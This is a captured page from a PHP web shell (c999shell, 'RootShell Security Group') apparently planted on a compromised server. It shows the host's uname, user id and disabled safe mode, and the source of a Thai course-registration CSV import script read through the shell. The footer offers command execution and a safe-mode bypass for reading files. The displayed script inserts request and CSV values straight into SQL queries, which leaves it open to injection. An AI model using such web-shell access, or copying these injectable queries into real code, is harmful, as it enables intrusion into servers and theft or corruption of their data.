Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/reg-tools/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php if (isset($_REQUEST["submit"])) { //print_r($_REQUEST); //echo "<br>"; if (isset($_FILES['fileUpload'])) { $file = strtolower($_FILES["fileUpload"]["name"]); $type = strrchr($file, "."); if (($type == ".csv")) { $objFopen = fopen($_FILES["fileUpload"]["tmp_name"], 'r'); if ($objFopen) { while (!feof($objFopen)) { $tmp[] = fgetcsv($objFopen); } fclose($objFopen); $sql = "SELECT * FROM rg_Curriculum WHERE curId = '" . $_REQUEST["curSelect"] . "'"; $link->query($sql); $rsCur = $link->getnext(); echo "<br/> ***** นำเข้าข้อมูลรายวิชา " . $rsCur->curName . " ******<br/>"; for ($i = 1; $i < count($tmp); $i++) { $sql = "SELECT * FROM rg_CurriculumStructure WHERE csCurId = '" . $_REQUEST["curSelect"] . "' AND csSeq = '" . $tmp[$i][11] . "'"; $link->query($sql); $rsCs = $link->getnext(); $sql = "INSERT INTO rg_Course VALUES ('','" . $tmp[$i][1] . "','" . $tmp[$i][2] . "','" . $tmp[$i][3] . "','" . $tmp[$i][4] . "','','','','','" . $tmp[$i][7] . "','" . $tmp[$i][8] . "','" . $tmp[$i][9] . "','" . $tmp[$i][8] . "','" . $tmp[$i][9] . "','" . $tmp[$i][10] . "','" . $tmp[$i][5] . "','Y','','" . $rsCs->csCdId1 . "','1',now(),'reg-tools',now(),'reg-tools')"; $link->query($sql); $sql = "INSERT INTO rg_ProgramCourses VALUES ('" . $rsCs->csCurId . "','" . $rsCs->csCdId1 . "','" . $rsCs->csCdId2 . "','" . $link->last_insert_id() . "','C','C','Y')"; $link->query($sql); echo " " . $i . ".บันทึกข้อมูลสำเร็จ -> " . $tmp[$i][1] . " " . $tmp[$i][3] . "<br>"; } } } else { echo '<br><br><hr><div align="center" style="color:#F00;">การอัพโหลดไม่สำเร็จ !!!<br>กรุณาอัพโหลดไฟล์ CSV เท่านั้น</div>'; } } } else { ?> <form method="post" name="regForm" id="regForm" action="" enctype="multipart/form-data" class="needs-validation" novalidate> <div class="container"> <p class="fs-3">เพิ่มข้อมูลรายวิชา</p> <div class="input-group mb-3"> <label for="inputGroupSelect01" class="input-group-text">หลักสูตร</label> <select class="form-select" name="curSelect" id="curSelect" aria-label="Default select example" required> <option selected disabled value="">-- เลือก --</option> <?php $sql = "SELECT * FROM rg_Curriculum WHERE curStatus = 'Y'"; $link->query($sql); while ($data = $link->getnext()) { echo "<option value='" . $data->curId . "'>" . $data->curName . "</option>"; } ?> </select> <div class="invalid-feedback"> กรุณาเลือกหลักสูตร </div> </div> <!--<div class="input-group mb-3" id="condition"> <label for="inputGroupSelect02" class="input-group-text">หมวดวิชา</label> <select class="form-select" name="conSelect" id="conSelect" aria-label="Default select example" required> <option selected disabled value="">-- เลือก --</option> <?php /*$sql = "SELECT * FROM rg_Condition Where cdNameE LIKE '%วสส.ชลบุรี%' ORDER BY cdId DESC"; $link->query($sql); while ($data = $link->getnext()) { echo "<option value='" . $data->cdId . "'>" . $data->cdName . "</option>"; }*/ ?> </select> <div class="invalid-feedback"> กรุณาเลือกหมวดวิชา </div> </div>--> <div class="input-group mb-3"> <label class="input-group-text" for="inputGroupFile01">อัพโหลดไฟล์รายวิชา (csv)</label> <input type="file" class="form-control" name="fileUpload" id="fileUpload" accept=".csv" required> <div class="invalid-feedback"> กรุณาเลือกไฟล์ csv </div> </div> <div class="col-12 text-center"> <button class="btn btn-primary" type="submit" name="submit">Import</button> </div> </div> </form> <script> (() => { 'use strict' // Fetch all the forms we want to apply custom Bootstrap validation styles to const forms = document.querySelectorAll('.needs-validation') // Loop over them and prevent submission Array.from(forms).forEach(form => { form.addEventListener('submit', event => { if (!form.checkValidity()) { event.preventDefault() event.stopPropagation() } form.classList.add('was-validated') }, false) }) })() </script> <?php } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]-- |